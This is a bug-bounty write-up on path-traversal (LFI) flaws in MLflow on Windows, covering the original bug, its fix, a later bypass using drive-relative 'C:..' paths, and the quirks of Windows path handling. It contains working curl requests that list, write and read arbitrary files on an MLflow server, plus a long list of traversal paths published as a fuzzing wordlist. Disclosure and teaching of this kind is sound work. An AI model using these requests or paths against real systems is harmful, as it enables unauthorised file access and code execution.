
Testing LFI in Windows: How I (never) got a $30000 bounty

Intro

At the very start of the ML hype, I decided to look at some open-source bug bounty programs on the huntr.com platform. I ended up choosing the MLflow program, as it had some interesting bugs in the past and a ginormous code base. That is how this whole story started.

The original bug

The repository has a sad history with LFIs, so I decided to focus on them specifically.


Initial analysis

It wasn’t long before I landed at the validate_path_is_safe() helper, which was used all over the MLflow server to prevent path traversal:

_OS_ALT_SEPS = [sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != "/"]
...

def validate_path_is_safe(path):
    """
    Validates that the specified path is safe to join with a trusted prefix. This is a security
    measure to prevent path traversal attacks.
    """
    if (
        any((s in path) for s in _OS_ALT_SEPS)
        or ".." in path.split(posixpath.sep)
        or posixpath.isabs(path)
    ):
        raise MlflowException(f"Invalid path: {path}", error_code=INVALID_PARAMETER_VALUE)

The function performs the following checks:

  • Checks if any directory separators other than / are in the path (e.g. \ in Windows)
  • Splits the path by / and checks for any parent directory traversals ..
  • Checks if the path is an absolute Posix path (starts with /)

If any of these criteria is met, the path is rejected.

It looks good on the surface, but have you spotted the bug already? Keep in mind that this code should work on both Windows and Unix machines!

The answer: the developers forgot to account for absolute Windows paths. Any absolute Windows path that uses forward slashes / as directory separators will pass all three checks just fine!

# Python 3.9.6 on Windows 10 Pro x64 Build 19045 
>>> import os
>>> import posixpath
>>> test_path = 'C:/some/abs/path'
>>>
>>> _OS_ALT_SEPS = [sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != "/"]
>>>
>>> any((s in test_path) for s in _OS_ALT_SEPS)
False
>>> ".." in test_path.split(posixpath.sep)
False
>>> posixpath.isabs(test_path)
False

Thus, we can bypass this check and perform the path traversal. But what is the impact?

Impact

Oh boy, there is some impact! We can read, write, and list arbitrary files by traversing the disk. This essentially gives an attacker full File Explorer-like control over the system, and we can easily overwrite MLflow Python files or any other user-owned scripts/executables with our own to achieve RCE.

  1. Listing files

    Method 1

     # CURL request:
     curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/artifacts/list?run_uuid=POC_RUN_ID&path=C:/"
        
     # Response:
     {
         "root_uri": "file:///C:/Users/Strawberry/Desktop/projects/mlflow/examples/shap/mlruns/0/POC_RUN_ID/artifacts",
         "files": [
             {
             "path": "../../../../../../../../../..",
             "is_dir": true
             },
             {
             "path": "../../../../../../../../../../../Program Files",
             "is_dir": true
             },
             {
             "path": "../../../../../../../../../../../Windows",
             "is_dir": true
             },
             ...
         ]
     }
    

    Method 2

     # CURL request:
     curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"
        
     # Response:
     {
         "files": [
             {
             "path": "..",
             "is_dir": true
             },
             ...
             {
             "path": "Program Files",
             "is_dir": true
             },
             {
             "path": "Program Files (x86)",
             "is_dir": true
             },
             {
             "path": "ProgramData",
             "is_dir": true
             },
             {
             "path": "Recovery",
             "is_dir": true
             },
             {
             "path": "System Volume Information",
             "is_dir": true
             }
         ]
     }
    
  2. Writing files

     # CURL request:
     curl -X 'PUT' -d 'this is write poc' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts/C:/temp/poc.txt"
        
     # Response:
     {}
    
  3. Reading files

    Method 1

     # CURL request:
     curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/get-artifact?path=C:/temp/poc.txt&run_uuid=POC_RUN_ID"
        
     # Response:
     this is write poc
    

    Method 2

     # CURL request:
     curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/model-versions/get-artifact?path=C:/Temp/poc.txt&run_uuid=POC_RUN_ID&name=POC_MODEL_NAME&version=1"
        
     # Response:
     this is write poc
    

You can view the full write-up on the huntr.com platform here.

This bug was assigned CVE-2023-3765 with a perfect 10.0 score ;) And a $0 bounty, since, at that time, the project did not have a budget for it.

The fix

After an internal discussion with the MLflow developers (I love you, guys!), we’ve created the following fix pull request.

The updated code for the validator looks like this:

def validate_path_is_safe(path):
    """
    Validates that the specified path is safe to join with a trusted prefix. This is a security
    measure to prevent path traversal attacks.
    A valid path should:
        not contain separators other than '/'
        not contain .. to navigate to parent dir in path
        not be an absolute path
    """
    if is_file_uri(path):
        path = local_file_uri_to_path(path)
    if (
        any((s in path) for s in _OS_ALT_SEPS)
        or ".." in path.split("/")
        or pathlib.PureWindowsPath(path).is_absolute()
        or pathlib.PurePosixPath(path).is_absolute()
    ):
        raise MlflowException(f"Invalid path: {path}", error_code=INVALID_PARAMETER_VALUE)

OK, we now explicitly check for absolute Windows and Posix paths in the validator. We should be safe, right? Right?

Haxatron’s $30000 bypass

Wrong! Only a month later, after the public disclosure of my bug, a hunter named Haxatron found a curious bypass of the fix above and was awarded a whopping sum of $30000 for it!!!!

I stumbled over this report a couple of weeks ago when I wanted to share my original BB report with a friend.

My face was that of the hamster at the top of this page… Apparently, I should’ve waited a couple of months with my submission ._.

Well, I can’t predict the future :D So let’s just focus on the bypass CVE-2023-6015, since it contains some really interesting techniques that could help to educate us all!

If you don’t know what starting a path on Windows with C: does, basically if a path starts with C: on Windows then we treat it such that we remove the drive letter and colon from the beginning. For instance a path C:../.ssh/id_rsa will get converted to ../.ssh/id_rsa. As such we can break out of the root directory up to 1 layer.

WTF is this path? How could it be valid? I have literally never seen this path format. That needs some research.

Weird world of Windows paths

Yeah. Did you know that there are like 4 separate ways to construct an absolute path and 3 ways to create a relative one? I did not!

This wonderful research by Erik Jälevik really shines light on this whole mess. Based on the article, we can point out the following path formats. You can also view the explanation of this monstrosity in the official MSDN documentation here.

Supported absolute path formats

  • C:\path\to\file — your good old absolute drive path
  • \\.\C:\path\to\file — device absolute path
  • \\?\C:\path\to\file — device absolute path (will not be normalized; see Normalization section below)
  • \\localhost\C$\path\to\file — UNC drive share absolute path

Supported relative path formats

  • ..\..\..\path\to\file — completely normal and sane relative path
  • \path\to\file — “current drive relative” path. Who the fuck created this shit? This is basically an absolute path on the currently selected drive (i.e. if the C: drive is used, it will be identical to C:\path\to\file). Who needs this stuff??? It can be so easily confused with Posix paths!
  • C:..\..\..\path\to\file — “current drive folder relative” path. This is the one used in the bypass writeup! And, yet again, Windows supports an almost cryptic path format that should not exist. If your current directory is C:\Users\User, this path will be identical to C:\Users\User\..\..\..\path\to\file. Since it is considered “relative”, it bypassed the pathlib check in the original fix.
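To see why the drive-relative form slips past both versions of the validator, here is an added example (not code from MLflow or from the original post) that re-implements the two checks shown earlier and compares them with a join-then-verify containment check. The artifact root, the function names and the containment approach are assumptions made for illustration; Windows path rules are modelled with ntpath so the snippet runs on any OS.

```python
import ntpath
import pathlib
import posixpath

# Assumption: model a Windows host, where os.sep is "\\" and os.path.altsep is "/".
_OS_ALT_SEPS = ["\\"]

# Constructed artifact root for the demonstration (hypothetical location).
ROOT = r"C:\srv\mlruns\0\run\artifacts"


def original_check_rejects(path):
    """Logic of the first validator in the post; True means 'rejected'."""
    return (
        any(s in path for s in _OS_ALT_SEPS)
        or ".." in path.split(posixpath.sep)
        or posixpath.isabs(path)
    )


def patched_check_rejects(path):
    """Logic of the updated validator (file-URI handling omitted)."""
    return (
        any(s in path for s in _OS_ALT_SEPS)
        or ".." in path.split("/")
        or pathlib.PureWindowsPath(path).is_absolute()
        or pathlib.PurePosixPath(path).is_absolute()
    )


def resolve_under_root(root, user_path):
    """Hypothetical containment check: join first, normalise, then compare.

    Returns the normalised Windows path if it stays under root, else None.
    The check is purely lexical; it does not follow symlinks or junctions.
    """
    root_norm = ntpath.normpath(root)
    candidate = ntpath.normpath(ntpath.join(root_norm, user_path))
    try:
        common = ntpath.commonpath([root_norm, candidate])
    except ValueError:
        # Raised when the drives (or UNC shares) differ: cannot be under root.
        return None
    if ntpath.normcase(common) != ntpath.normcase(root_norm):
        return None
    return candidate


def compare(paths, root=ROOT):
    """Per path: (path, original rejects, patched rejects, containment rejects)."""
    return [
        (
            p,
            original_check_rejects(p),
            patched_check_rejects(p),
            resolve_under_root(root, p) is None,
        )
        for p in paths
    ]


if __name__ == "__main__":
    # Sample inputs taken from the path formats discussed in the post.
    samples = [
        "model/MLmodel",                # ordinary relative artifact path
        "C:/some/abs/path",             # absolute drive path, forward slashes
        "C:../.ssh/id_rsa",             # drive-relative path from the bypass
        "//localhost/C$/path/to/file",  # UNC path, forward slashes
    ]
    for row in compare(samples):
        print(row)
    # Where the drive-relative path lands once it is joined to the root:
    print(ntpath.normpath(ntpath.join(ROOT, "C:../.ssh/id_rsa")))
```

The string-level checks inspect the input before it is joined, while the containment check inspects the result of the join, which is the value the file system call actually receives.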

Canonicalization of alternative separators

Of course, Windows also supports forward slashes as directory separators, so paths like //localhost/C$/path/to/file will also work just fine.

In fact, any forward slashes / are simply replaced internally with back slashes \.

Any repeating instances of separators are then replaced with a single one.

Normalization

Each path that does not start with \\?\ also goes through the normalization process:

  • The current directory is prepended to relative paths
  • Directory separators are canonicalized
  • Relative directory components (. for the current directory and .. for the parent directory) are evaluated
  • Any trailing spaces (0x20) and dots (0x2e) are removed.

Compiling every bit together

Have I broken your mind already? Not so fast!

We can chain all those Windows path rules to make batshit insane paths like \/127.0.0.1\C$/Windows///////\system32/drivers//////\etc/hosts....... possible.

Do not believe me? See for yourself! Just run this code below:

using System;
using System.IO;

class Program
{
    static string[] paths =
    {
        "\\/127.0.0.1\\C$/Windows///////\\system32/drivers//////\\etc/hosts.......     ",
        "//./C:/Windows/system32/drivers/etc/hosts",
        "\\/./C:/Windows/system32/drivers/etc/hosts",
        "/\\./C:/Windows/system32/drivers/etc/hosts",
        "\\\\.\\C:\\Windows\\system32\\drivers\\etc\\hosts",
        "\\/.\\C:\\Windows\\system32\\drivers\\etc\\hosts",
        "/\\.\\C:\\Windows\\system32\\drivers\\etc\\hosts",
        "//./C:/Windows/system32/drivers/etc/hosts.",
        "\\/./C:/Windows/system32/drivers/etc/hosts.",
        "/\\./C:/Windows/system32/drivers/etc/hosts.",
        "\\\\.\\C:\\Windows\\system32\\drivers\\etc\\hosts.",
        "\\/.\\C:\\Windows\\system32\\drivers\\etc\\hosts.",
        "/\\.\\C:\\Windows\\system32\\drivers\\etc\\hosts.",
        "\\\\?\\C:\\Windows\\system32\\drivers\\etc\\hosts",
        "\\/?\\C:\\Windows\\system32\\drivers\\etc\\hosts",
        "/\\?\\C:\\Windows\\system32\\drivers\\etc\\hosts",
        "//?/C:/Windows/system32/drivers/etc/hosts",
        "\\/?/C:/Windows/system32/drivers/etc/hosts",
        "/\\?/C:/Windows/system32/drivers/etc/hosts",
        "\\\\localhost\\C$\\Windows\\system32\\drivers\\etc\\hosts",
        "\\/localhost\\C$\\Windows\\system32\\drivers\\etc\\hosts",
        "/\\localhost\\C$\\Windows\\system32\\drivers\\etc\\hosts",
        "//localhost/C$/Windows/system32/drivers/etc/hosts",
        "\\/localhost/C$/Windows/system32/drivers/etc/hosts",
        "/\\localhost/C$/Windows/system32/drivers/etc/hosts",
        "\\\\localhost\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
        "\\/localhost\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
        "/\\localhost\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
        "//localhost/C$/Windows/system32/drivers/etc/hosts.",
        "\\/localhost/C$/Windows/system32/drivers/etc/hosts.",
        "/\\localhost/C$/Windows/system32/drivers/etc/hosts.",
        "\\\\127.0.0.1\\C$\\Windows\\system32\\drivers\\etc\\hosts",
        "\\/127.0.0.1\\C$\\Windows\\system32\\drivers\\etc\\hosts",
        "/\\127.0.0.1\\C$\\Windows\\system32\\drivers\\etc\\hosts",
        "//127.0.0.1/C$/Windows/system32/drivers/etc/hosts",
        "\\/127.0.0.1/C$/Windows/system32/drivers/etc/hosts",
        "/\\127.0.0.1/C$/Windows/system32/drivers/etc/hosts",
        "\\\\127.0.0.1\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
        "\\/127.0.0.1\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
        "/\\127.0.0.1\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
        "//127.0.0.1/C$/Windows/system32/drivers/etc/hosts.",
        "\\/127.0.0.1/C$/Windows/system32/drivers/etc/hosts.",
        "/\\127.0.0.1/C$/Windows/system32/drivers/etc/hosts.",
        "//::1/C$/Windows/system32/drivers/etc/hosts",
        "\\/::1/C$/Windows/system32/drivers/etc/hosts",
        "/\\::1/C$/Windows/system32/drivers/etc/hosts",
        "\\\\::1\\C$\\Windows\\system32\\drivers\\etc\\hosts",
        "\\/::1\\C$\\Windows\\system32\\drivers\\etc\\hosts",
        "/\\::1\\C$\\Windows\\system32\\drivers\\etc\\hosts",
        "//::1/C$/Windows/system32/drivers/etc/hosts.",
        "\\/::1/C$/Windows/system32/drivers/etc/hosts.",
        "/\\::1/C$/Windows/system32/drivers/etc/hosts.",
        "\\\\::1\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
        "\\/::1\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
        "/\\::1\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
        "C:..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "C:..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "C:..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "C:..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "C:..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "C:..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "C:..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "C:..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "C:..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "C:..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "C:..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "C:..\\Windows\\system32\\drivers\\etc\\hosts",
        "C:../../../../../../../../../../../../Windows/system32/drivers/etc/hosts",
        "C:../../../../../../../../../../../Windows/system32/drivers/etc/hosts",
        "C:../../../../../../../../../../Windows/system32/drivers/etc/hosts",
        "C:../../../../../../../../../Windows/system32/drivers/etc/hosts",
        "C:../../../../../../../../Windows/system32/drivers/etc/hosts",
        "C:../../../../../../../Windows/system32/drivers/etc/hosts",
        "C:../../../../../../Windows/system32/drivers/etc/hosts",
        "C:../../../../../Windows/system32/drivers/etc/hosts",
        "C:../../../../Windows/system32/drivers/etc/hosts",
        "C:../../../Windows/system32/drivers/etc/hosts",
        "C:../../Windows/system32/drivers/etc/hosts",
        "C:../Windows/system32/drivers/etc/hosts",
        "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "..\\Windows\\system32\\drivers\\etc\\hosts",
        "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
        "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
        "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
        "..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
        "..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
        "..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
        "..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
        "..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
        "..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
        "..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
        "..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
        "..\\Windows\\system32\\drivers\\etc\\hosts.",
        "../../../../../../../../../../../../Windows/system32/drivers/etc/hosts",
        "../../../../../../../../../../../Windows/system32/drivers/etc/hosts",
        "../../../../../../../../../../Windows/system32/drivers/etc/hosts",
        "../../../../../../../../../Windows/system32/drivers/etc/hosts",
        "../../../../../../../../Windows/system32/drivers/etc/hosts",
        "../../../../../../../Windows/system32/drivers/etc/hosts",
        "../../../../../../Windows/system32/drivers/etc/hosts",
        "../../../../../Windows/system32/drivers/etc/hosts",
        "../../../../Windows/system32/drivers/etc/hosts",
        "../../../Windows/system32/drivers/etc/hosts",
        "../../Windows/system32/drivers/etc/hosts",
        "../Windows/system32/drivers/etc/hosts",
        "../../../../../../../../../../../../Windows/system32/drivers/etc/hosts.",
        "../../../../../../../../../../../Windows/system32/drivers/etc/hosts.",
        "../../../../../../../../../../Windows/system32/drivers/etc/hosts.",
        "../../../../../../../../../Windows/system32/drivers/etc/hosts.",
        "../../../../../../../../Windows/system32/drivers/etc/hosts.",
        "../../../../../../../Windows/system32/drivers/etc/hosts.",
        "../../../../../../Windows/system32/drivers/etc/hosts.",
        "../../../../../Windows/system32/drivers/etc/hosts.",
        "../../../../Windows/system32/drivers/etc/hosts.",
        "../../../Windows/system32/drivers/etc/hosts.",
        "../../Windows/system32/drivers/etc/hosts.",
        "../Windows/system32/drivers/etc/hosts.",
        "../..\\../..\\../..\\../..\\../..\\../..\\Windows/system32\\drivers/etc\\hosts",
        "../..\\../..\\../..\\../..\\../..\\..\\Windows/system32\\drivers/etc\\hosts",
        "../..\\../..\\../..\\../..\\../..\\Windows/system32\\drivers/etc\\hosts",
        "../..\\../..\\../..\\../..\\..\\Windows/system32\\drivers/etc\\hosts",
        "../..\\../..\\../..\\../..\\Windows/system32\\drivers/etc\\hosts",
        "../..\\../..\\../..\\..\\Windows/system32\\drivers/etc\\hosts",
        "../..\\../..\\../..\\Windows/system32\\drivers/etc\\hosts",
        "../..\\../..\\..\\Windows/system32\\drivers/etc\\hosts",
        "../..\\../..\\Windows/system32\\drivers/etc\\hosts",
        "../..\\..\\Windows/system32\\drivers/etc\\hosts",
        "../..\\Windows/system32\\drivers/etc\\hosts",
        "../\\Windows/system32\\drivers/etc\\hosts",
        "RANDOMDIR..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "RANDOMDIR..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "RANDOMDIR..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "RANDOMDIR..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "RANDOMDIR..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "RANDOMDIR..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "RANDOMDIR..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "RANDOMDIR..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "RANDOMDIR..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "RANDOMDIR..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "RANDOMDIR..\\..\\Windows\\system32\\drivers\\etc\\hosts",
        "RANDOMDIR..\\Windows\\system32\\drivers\\etc\\hosts",
        "RANDOMDIR../../../../../../../../../../../../Windows/system32/drivers/etc/hosts",
        "RANDOMDIR../../../../../../../../../../../Windows/system32/drivers/etc/hosts",
        "RANDOMDIR../../../../../../../../../../Windows/system32/drivers/etc/hosts",
        "RANDOMDIR../../../../../../../../../Windows/system32/drivers/etc/hosts",
        "RANDOMDIR../../../../../../../../Windows/system32/drivers/etc/hosts",
        "RANDOMDIR../../../../../../../Windows/system32/drivers/etc/hosts",
        "RANDOMDIR../../../../../../Windows/system32/drivers/etc/hosts",
        "RANDOMDIR../../../../../Windows/system32/drivers/etc/hosts",
        "RANDOMDIR../../../../Windows/system32/drivers/etc/hosts",
        "RANDOMDIR../../../Windows/system32/drivers/etc/hosts",
        "RANDOMDIR../../Windows/system32/drivers/etc/hosts",
        "RANDOMDIR../Windows/system32/drivers/etc/hosts",
        "C:/Windows/system32/drivers/etc/hosts",
        "C:\\Windows\\system32\\drivers\\etc\\hosts",
        "C:/Windows/system32/drivers/etc/hosts.",
        "C:\\Windows\\system32\\drivers\\etc\\hosts."
    };

    static void Main(string[] args)
    {
        foreach(string path in paths)
        {
            try
            {
                // Check if the file exists
                if (File.Exists(path))
                {
                    // Read the contents of the file
                    string fileContent = File.ReadAllText(path);
                    Console.WriteLine($"[+] Path: {path}");
                }
                else
                {
                    Console.WriteLine($"[-] Path: {path}");
                }
            }
            catch (Exception)
            {
                Console.WriteLine($"Path error: {path}");
            }
        }
    }
}

Every path in the list will return a valid result!


Windows LFI Wordlist

We are now ready to apply our newly gathered knowledge to create an unconventional list of Windows paths that can be used to fuzz for LFI. It contains the same paths as the paths array in the test program above. I have also submitted it to the SecLists repository to make it accessible to a wider circle of security folk :)

Conclusion

Moral of the story? You can do some crazy shit with paths in Windows!

Eh… And don’t rush to submit your bug bounty reports, I guess ¯\_(ツ)_/¯ ?

This post is licensed under CC BY 4.0 by the author.